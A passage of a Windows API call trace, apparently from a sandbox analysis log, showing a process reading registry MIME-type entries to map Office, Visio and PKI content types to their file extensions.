lpcbData=0x19fc14*=0xa) returned 0x0 [0104.440] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".xls", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.441] CharLowerBuffW (in: lpsz=".xls", cchLength=0x4 | out: lpsz=".xls") returned 0x4 [0104.441] CharLowerBuffW (in: lpsz="application/vnd.ms-excel", cchLength=0x18 | out: lpsz="application/vnd.ms-excel") returned 0x18 [0104.441] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.441] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-excel.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.441] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.441] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xlsx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.442] CharLowerBuffW (in: lpsz=".xlsx", cchLength=0x5 | out: lpsz=".xlsx") returned 0x5 [0104.442] CharLowerBuffW (in: lpsz="application/vnd.ms-excel.12", cchLength=0x1b | out: lpsz="application/vnd.ms-excel.12") returned 0x1b [0104.442] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.442] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-excel.addin.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.443] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.444] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xlam", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.503] CharLowerBuffW (in: lpsz=".xlam", cchLength=0x5 | out: lpsz=".xlam") returned 0x5 [0104.503] CharLowerBuffW (in: lpsz="application/vnd.ms-excel.addin.macroEnabled.12", cchLength=0x2e | out: lpsz="application/vnd.ms-excel.addin.macroenabled.12") returned 0x2e [0104.503] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.503] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-excel.sheet.binary.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.504] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.504] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xlsb", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.505] CharLowerBuffW (in: lpsz=".xlsb", cchLength=0x5 | out: lpsz=".xlsb") returned 0x5 [0104.505] CharLowerBuffW (in: lpsz="application/vnd.ms-excel.sheet.binary.macroEnabled.12", cchLength=0x35 | out: lpsz="application/vnd.ms-excel.sheet.binary.macroenabled.12") returned 0x35 [0104.505] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.505] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-excel.sheet.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.506] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.507] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xlsm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.507] CharLowerBuffW (in: lpsz=".xlsm", cchLength=0x5 | out: lpsz=".xlsm") returned 0x5 [0104.507] CharLowerBuffW (in: lpsz="application/vnd.ms-excel.sheet.macroEnabled.12", cchLength=0x2e | out: lpsz="application/vnd.ms-excel.sheet.macroenabled.12") returned 0x2e [0104.508] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.508] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-excel.template.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.509] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.510] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".xltm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.510] CharLowerBuffW (in: lpsz=".xltm", cchLength=0x5 | out: lpsz=".xltm") returned 0x5 [0104.510] CharLowerBuffW (in: lpsz="application/vnd.ms-excel.template.macroEnabled.12", cchLength=0x31 | out: lpsz="application/vnd.ms-excel.template.macroenabled.12") returned 0x31 [0104.510] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.510] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-officetheme", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.510] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.511] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".thmx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.511] CharLowerBuffW (in: lpsz=".thmx", cchLength=0x5 | out: lpsz=".thmx") returned 0x5 [0104.511] CharLowerBuffW (in: lpsz="application/vnd.ms-officetheme", cchLength=0x1e | out: lpsz="application/vnd.ms-officetheme") returned 0x1e [0104.511] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.511] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-pki.certstore", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.512] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.512] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".sst", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.512] CharLowerBuffW (in: lpsz=".sst", cchLength=0x4 | out: lpsz=".sst") returned 0x4 [0104.512] CharLowerBuffW (in: lpsz="application/vnd.ms-pki.certstore", cchLength=0x20 | out: lpsz="application/vnd.ms-pki.certstore") returned 0x20 [0104.512] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.512] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-pki.pko", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.514] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.515] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".pko", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.515] CharLowerBuffW (in: lpsz=".pko", cchLength=0x4 | out: lpsz=".pko") returned 0x4 [0104.515] CharLowerBuffW (in: lpsz="application/vnd.ms-pki.pko", cchLength=0x1a | out: lpsz="application/vnd.ms-pki.pko") returned 0x1a [0104.515] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.515] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-pki.seccat", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.516] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.516] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".cat", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.516] CharLowerBuffW (in: lpsz=".cat", cchLength=0x4 | out: lpsz=".cat") returned 0x4 [0104.517] CharLowerBuffW (in: lpsz="application/vnd.ms-pki.seccat", cchLength=0x1d | out: lpsz="application/vnd.ms-pki.seccat") returned 0x1d [0104.517] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.517] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-powerpoint", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.518] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.518] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".ppt", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.519] CharLowerBuffW (in: lpsz=".ppt", cchLength=0x4 | out: lpsz=".ppt") returned 0x4 [0104.519] CharLowerBuffW (in: lpsz="application/vnd.ms-powerpoint", cchLength=0x1d | out: lpsz="application/vnd.ms-powerpoint") returned 0x1d [0104.519] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.519] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-powerpoint.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.521] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.521] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".pptx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.522] CharLowerBuffW (in: lpsz=".pptx", cchLength=0x5 | out: lpsz=".pptx") returned 0x5 [0104.522] CharLowerBuffW (in: lpsz="application/vnd.ms-powerpoint.12", cchLength=0x20 | out: lpsz="application/vnd.ms-powerpoint.12") returned 0x20 [0104.522] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.522] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-powerpoint.addin.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.522] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.522] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".ppam", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.524] CharLowerBuffW (in: lpsz=".ppam", cchLength=0x5 | out: lpsz=".ppam") returned 0x5 [0104.524] CharLowerBuffW (in: lpsz="application/vnd.ms-powerpoint.addin.macroEnabled.12", cchLength=0x33 | out: lpsz="application/vnd.ms-powerpoint.addin.macroenabled.12") returned 0x33 [0104.524] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.525] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-powerpoint.presentation.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.525] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.526] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".pptm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.527] CharLowerBuffW (in: lpsz=".pptm", cchLength=0x5 | out: lpsz=".pptm") returned 0x5 [0104.527] CharLowerBuffW (in: lpsz="application/vnd.ms-powerpoint.presentation.macroEnabled.12", cchLength=0x3a | out: lpsz="application/vnd.ms-powerpoint.presentation.macroenabled.12") returned 0x3a [0104.528] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.528] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-powerpoint.slide.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.529] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.529] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".sldm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.529] CharLowerBuffW (in: lpsz=".sldm", cchLength=0x5 | out: lpsz=".sldm") returned 0x5 [0104.529] CharLowerBuffW (in: lpsz="application/vnd.ms-powerpoint.slide.macroEnabled.12", cchLength=0x33 | out: lpsz="application/vnd.ms-powerpoint.slide.macroenabled.12") returned 0x33 [0104.529] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.529] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-powerpoint.slideshow.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.529] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.530] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".ppsm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.531] CharLowerBuffW (in: lpsz=".ppsm", cchLength=0x5 | out: lpsz=".ppsm") returned 0x5 [0104.531] CharLowerBuffW (in: lpsz="application/vnd.ms-powerpoint.slideshow.macroEnabled.12", cchLength=0x37 | out: lpsz="application/vnd.ms-powerpoint.slideshow.macroenabled.12") returned 0x37 [0104.531] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.531] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-powerpoint.template.macroEnabled.12", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.532] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.532] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".potm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.533] CharLowerBuffW (in: lpsz=".potm", cchLength=0x5 | out: lpsz=".potm") returned 0x5 [0104.533] CharLowerBuffW (in: lpsz="application/vnd.ms-powerpoint.template.macroEnabled.12", cchLength=0x36 | out: lpsz="application/vnd.ms-powerpoint.template.macroenabled.12") returned 0x36 [0104.533] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.533] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-project", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.534] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.534] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".mpp", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.535] CharLowerBuffW (in: lpsz=".mpp", cchLength=0x4 | out: lpsz=".mpp") returned 0x4 [0104.535] CharLowerBuffW (in: lpsz="application/vnd.ms-project", cchLength=0x1a | out: lpsz="application/vnd.ms-project") returned 0x1a [0104.535] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.535] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-publisher", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.535] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.536] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".pub", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.537] CharLowerBuffW (in: lpsz=".pub", cchLength=0x4 | out: lpsz=".pub") returned 0x4 [0104.537] CharLowerBuffW (in: lpsz="application/vnd.ms-publisher", cchLength=0x1c | out: lpsz="application/vnd.ms-publisher") returned 0x1c [0104.537] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.537] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-visio.drawing", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.595] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.596] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".vsdx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.597] CharLowerBuffW (in: lpsz=".vsdx", cchLength=0x5 | out: lpsz=".vsdx") returned 0x5 [0104.597] CharLowerBuffW (in: lpsz="application/vnd.ms-visio.drawing", cchLength=0x20 | out: lpsz="application/vnd.ms-visio.drawing") returned 0x20 [0104.597] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.597] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-visio.drawing.macroEnabled", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.599] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.600] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".vsdm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.601] CharLowerBuffW (in: lpsz=".vsdm", cchLength=0x5 | out: lpsz=".vsdm") returned 0x5 [0104.601] CharLowerBuffW (in: lpsz="application/vnd.ms-visio.drawing.macroEnabled", cchLength=0x2d | out: lpsz="application/vnd.ms-visio.drawing.macroenabled") returned 0x2d [0104.601] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.601] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-visio.stencil", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.602] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.602] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".vssx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.603] CharLowerBuffW (in: lpsz=".vssx", cchLength=0x5 | out: lpsz=".vssx") returned 0x5 [0104.603] CharLowerBuffW (in: lpsz="application/vnd.ms-visio.stencil", cchLength=0x20 | out: lpsz="application/vnd.ms-visio.stencil") returned 0x20 [0104.603] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.604] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-visio.stencil.macroEnabled", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.604] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.605] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".vssm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.605] CharLowerBuffW (in: lpsz=".vssm", cchLength=0x5 | out: lpsz=".vssm") returned 0x5 [0104.605] CharLowerBuffW (in: lpsz="application/vnd.ms-visio.stencil.macroEnabled", cchLength=0x2d | out: lpsz="application/vnd.ms-visio.stencil.macroenabled") returned 0x2d [0104.605] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.605] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-visio.template", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.607] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.607] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".vstx", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.608] CharLowerBuffW (in: lpsz=".vstx", cchLength=0x5 | out: lpsz=".vstx") returned 0x5 [0104.608] CharLowerBuffW (in: lpsz="application/vnd.ms-visio.template", cchLength=0x21 | out: lpsz="application/vnd.ms-visio.template") returned 0x21 [0104.608] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.608] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-visio.template.macroEnabled", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.609] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.609] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".vstm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.610] CharLowerBuffW (in: lpsz=".vstm", cchLength=0x5 | out: lpsz=".vstm") returned 0x5 [0104.610] CharLowerBuffW (in: lpsz="application/vnd.ms-visio.template.macroEnabled", cchLength=0x2e | out: lpsz="application/vnd.ms-visio.template.macroenabled") returned 0x2e [0104.610] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.610] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\application/vnd.ms-visio.viewer", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.611] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.611] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".vdx", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.611] CharLowerBuffW (in: lpsz=".vdx", cchLength=0x4 | out: lpsz=".vdx") returned 0x4 [0104.611] CharLowerBuffW (in: lpsz="application/vnd.ms-visio.viewer", cchLength=0x1f | out: lpsz="application/vnd.ms-visio.viewer") returned 0x1f [0104.612] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.612] RegOpenKeyExW (in: 